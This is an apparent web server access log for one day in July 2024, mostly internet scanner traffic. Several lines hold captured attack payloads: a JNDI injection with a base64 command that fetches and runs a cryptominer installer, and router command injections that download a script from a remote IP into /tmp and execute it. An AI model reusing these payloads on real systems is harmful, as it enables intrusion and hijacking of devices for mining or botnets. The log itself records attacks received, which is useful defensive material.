94.156.10.164 - - [12/Jul/2024:00:00:15 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.121.69.27 - - [12/Jul/2024:00:22:51 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 20.118.68.185 - - [12/Jul/2024:00:28:14 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [12/Jul/2024:01:20:47 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [12/Jul/2024:01:20:51 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [12/Jul/2024:01:20:51 +0200] "GET /favicon.ico HTTP/1.1" 404 729 80.66.83.211 - - [12/Jul/2024:02:15:34 +0200] "-" 400 1930 94.156.10.163 - - [12/Jul/2024:02:23:19 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.246.7.54 - - [12/Jul/2024:02:28:18 +0200] "GET / HTTP/1.0" 200 1895 198.235.24.231 - - [12/Jul/2024:02:48:58 +0200] "-" 400 1930 198.235.24.231 - - [12/Jul/2024:02:48:58 +0200] "-" 400 1930 94.156.66.81 - - [12/Jul/2024:03:10:26 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 174.138.2.203 - - [12/Jul/2024:03:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:03:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:03:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:03:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:03:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:03:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:03:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:03:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 167.94.145.102 - - [12/Jul/2024:03:24:07 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.102 - - [12/Jul/2024:03:24:11 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.102 - - [12/Jul/2024:03:24:11 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [12/Jul/2024:03:25:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [12/Jul/2024:03:25:33 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:03:25:33 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:03:25:33 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:03:25:33 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:03:25:33 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:03:25:33 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:03:25:33 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:03:25:33 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 94.156.10.164 - - [12/Jul/2024:03:31:29 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 141.98.11.15 - - [12/Jul/2024:03:45:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 95.214.55.144 - - [12/Jul/2024:03:48:41 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//51.83.253.121:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuNHRoZXBvb2wudG9wL3NldHVwXzR0aGVwb29sX21pbmVyLnNoIHwgTENfQUxMPWVuX1VTLlVURi04IGJhc2ggLXMgNDk5YTZMTXZhbVdjdXFuVzd3bU1oNWlmTDFWU3o5YzNZUXAyUGNiQURGUDRhcjZhZDVldlBWUmV3QmZGcUhIUE5YVzRvclZlQVUxcmFVek1lVmZCUVozdFRwOEtaTEo=%7D%27) HTTP/1.1" 404 1189 87.121.69.27 - - [12/Jul/2024:04:09:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 121.150.255.1 - - [12/Jul/2024:04:10:41 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 187.202.148.32 - - [12/Jul/2024:04:21:38 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 172.206.141.138 - - [12/Jul/2024:04:24:18 +0200] "-" 400 1930 94.156.10.163 - - [12/Jul/2024:04:27:17 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.128.232.95 - - [12/Jul/2024:04:54:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [12/Jul/2024:04:55:59 +0200] "GET / HTTP/1.1" 200 1895 103.215.200.54 - - [12/Jul/2024:05:12:11 +0200] "GET / HTTP/1.1" 200 1895 190.97.232.82 - - [12/Jul/2024:05:16:23 +0200] "GET / HTTP/1.1" 200 1895 80.76.49.130 - - [12/Jul/2024:06:06:14 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 167.71.130.133 - - [12/Jul/2024:06:11:49 +0200] "-" 400 1930 36.72.181.107 - - [12/Jul/2024:07:18:02 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [12/Jul/2024:07:24:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.202 - - [12/Jul/2024:08:10:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [12/Jul/2024:08:10:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 44.220.185.165 - - [12/Jul/2024:08:19:39 +0200] "GET / HTTP/1.1" 200 1895 94.156.10.164 - - [12/Jul/2024:09:14:45 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 174.138.2.203 - - [12/Jul/2024:09:17:05 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:09:17:05 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:09:17:05 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:09:17:05 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:09:17:05 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:09:17:05 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:09:17:05 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:09:17:05 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:09:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:09:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:09:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:09:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:09:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:09:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:09:25:31 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:09:25:31 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 92.249.48.204 - - [12/Jul/2024:09:31:33 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [12/Jul/2024:10:01:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.10.163 - - [12/Jul/2024:10:11:15 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 64.62.156.108 - - [12/Jul/2024:10:15:06 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.108 - - [12/Jul/2024:10:15:32 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.112 - - [12/Jul/2024:10:15:43 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.113 - - [12/Jul/2024:10:15:50 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 149.50.103.48 - - [12/Jul/2024:10:36:37 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [12/Jul/2024:10:43:49 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [12/Jul/2024:10:43:49 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.224.128.63 - - [12/Jul/2024:10:43:49 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [12/Jul/2024:10:43:49 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 141.98.11.15 - - [12/Jul/2024:11:01:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [12/Jul/2024:11:12:30 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.10.164 - - [12/Jul/2024:11:27:25 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 84.54.51.37 - - [12/Jul/2024:11:35:11 +0200] "GET null HTTP/1.1" 400 1994 172.245.131.82 - - [12/Jul/2024:11:49:03 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [12/Jul/2024:12:04:24 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.128 - - [12/Jul/2024:12:09:43 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.62.197.91 - - [12/Jul/2024:12:48:15 +0200] "-" 400 1930 194.59.31.99 - - [12/Jul/2024:12:55:09 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.148.10.202 - - [12/Jul/2024:13:05:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [12/Jul/2024:13:05:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 79.161.11.82 - - [12/Jul/2024:13:56:02 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 149.50.103.48 - - [12/Jul/2024:14:02:57 +0200] "GET / HTTP/1.1" 200 1895 45.82.122.216 - - [12/Jul/2024:14:11:06 +0200] "GET / HTTP/1.1" 200 1895 45.82.122.216 - - [12/Jul/2024:14:11:06 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.82.122.216 - - [12/Jul/2024:14:11:06 +0200] "GET / HTTP/1.1" 200 1895 45.82.122.216 - - [12/Jul/2024:14:11:06 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 212.102.57.145 - - [12/Jul/2024:14:16:16 +0200] "CONNECT karlshochschule.de:443 HTTP/1.1" 400 804 87.121.69.27 - - [12/Jul/2024:14:46:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.102 - - [12/Jul/2024:14:48:16 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.102 - - [12/Jul/2024:14:48:19 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.102 - - [12/Jul/2024:14:48:20 +0200] "GET /favicon.ico HTTP/1.1" 404 729 94.156.10.164 - - [12/Jul/2024:14:59:43 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 174.138.2.203 - - [12/Jul/2024:15:17:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:15:17:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:15:17:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:15:17:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:15:17:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:15:17:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:15:17:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:15:17:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 165.154.138.34 - - [12/Jul/2024:15:19:55 +0200] "-" 400 1930 165.154.138.34 - - [12/Jul/2024:15:20:05 +0200] "GET / HTTP/1.1" 200 1895 165.154.138.34 - - [12/Jul/2024:15:20:24 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.138.34 - - [12/Jul/2024:15:20:24 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.138.34 - - [12/Jul/2024:15:20:24 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 174.138.2.203 - - [12/Jul/2024:15:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:15:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:15:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:15:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:15:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:15:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:15:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:15:25:30 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 91.238.181.24 - - [12/Jul/2024:15:42:33 +0200] "-" 400 1930 13.64.106.0 - - [12/Jul/2024:16:08:36 +0200] "GET /hudson HTTP/1.1" 404 724 94.156.10.163 - - [12/Jul/2024:16:18:14 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.121.69.27 - - [12/Jul/2024:16:49:57 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 167.94.146.48 - - [12/Jul/2024:17:13:12 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.48 - - [12/Jul/2024:17:13:16 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.48 - - [12/Jul/2024:17:13:16 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [12/Jul/2024:17:13:49 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 175.206.236.230 - - [12/Jul/2024:17:15:03 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 177.190.143.29 - - [12/Jul/2024:17:31:11 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.202 - - [12/Jul/2024:17:40:40 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [12/Jul/2024:17:40:40 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 66.249.66.161 - - [12/Jul/2024:17:40:48 +0200] "GET /robots.txt HTTP/1.1" 404 728 66.249.66.161 - - [12/Jul/2024:17:40:49 +0200] "GET /manager/html HTTP/1.1" 401 2499 149.50.103.48 - - [12/Jul/2024:18:01:54 +0200] "GET / HTTP/1.1" 200 1895 78.108.177.54 - - [12/Jul/2024:18:04:22 +0200] "GET / HTTP/1.0" 200 1895 206.168.32.109 - - [12/Jul/2024:18:06:18 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [12/Jul/2024:18:06:21 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [12/Jul/2024:18:06:21 +0200] "GET /favicon.ico HTTP/1.1" 404 729 149.50.103.48 - - [12/Jul/2024:19:12:49 +0200] "GET / HTTP/1.1" 200 1895 94.156.10.163 - - [12/Jul/2024:19:14:08 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 163.172.107.161 - - [12/Jul/2024:19:42:31 +0200] "CONNECT web.realsysadm.in:443 HTTP/1.1" 400 804 205.210.31.244 - - [12/Jul/2024:20:16:30 +0200] "GET / HTTP/1.0" 200 1895 104.168.70.165 - - [12/Jul/2024:20:28:17 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [12/Jul/2024:20:44:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.10.163 - - [12/Jul/2024:20:59:33 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 109.107.189.197 - - [12/Jul/2024:21:09:23 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [12/Jul/2024:21:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:21:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:21:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:21:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:21:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:21:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:21:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [12/Jul/2024:21:17:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 91.92.255.132 - - [12/Jul/2024:21:23:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [12/Jul/2024:21:25:35 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:21:25:35 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:21:25:35 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:21:25:35 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:21:25:35 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:21:25:35 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:21:25:35 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [12/Jul/2024:21:25:35 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 206.168.34.51 - - [12/Jul/2024:21:33:46 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.51 - - [12/Jul/2024:21:33:49 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.51 - - [12/Jul/2024:21:33:49 +0200] "GET /favicon.ico HTTP/1.1" 404 729 94.156.10.164 - - [12/Jul/2024:21:34:19 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 94.156.10.164 - - [12/Jul/2024:21:43:12 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 91.92.255.132 - - [12/Jul/2024:21:57:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 164.90.174.244 - - [12/Jul/2024:22:04:32 +0200] "-" 400 1930 164.90.174.244 - - [12/Jul/2024:22:06:16 +0200] "GET /hello HTTP/1.1" 404 723 149.50.103.48 - - [12/Jul/2024:22:23:41 +0200] "GET / HTTP/1.1" 200 1895 164.90.170.123 - - [12/Jul/2024:22:40:30 +0200] "-" 400 1930 164.90.170.123 - - [12/Jul/2024:22:41:52 +0200] "GET /hello HTTP/1.1" 404 723 45.156.129.48 - - [12/Jul/2024:22:47:57 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.111 - - [12/Jul/2024:22:50:57 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.111 - - [12/Jul/2024:22:51:00 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.111 - - [12/Jul/2024:22:51:01 +0200] "GET /favicon.ico HTTP/1.1" 404 729 94.156.10.164 - - [12/Jul/2024:23:08:17 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 185.218.126.70 - - [12/Jul/2024:23:22:05 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.202 - - [12/Jul/2024:23:28:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [12/Jul/2024:23:28:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 211.44.74.71 - - [12/Jul/2024:23:40:17 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 198.235.24.232 - - [12/Jul/2024:23:50:44 +0200] "GET / HTTP/1.1" 200 1895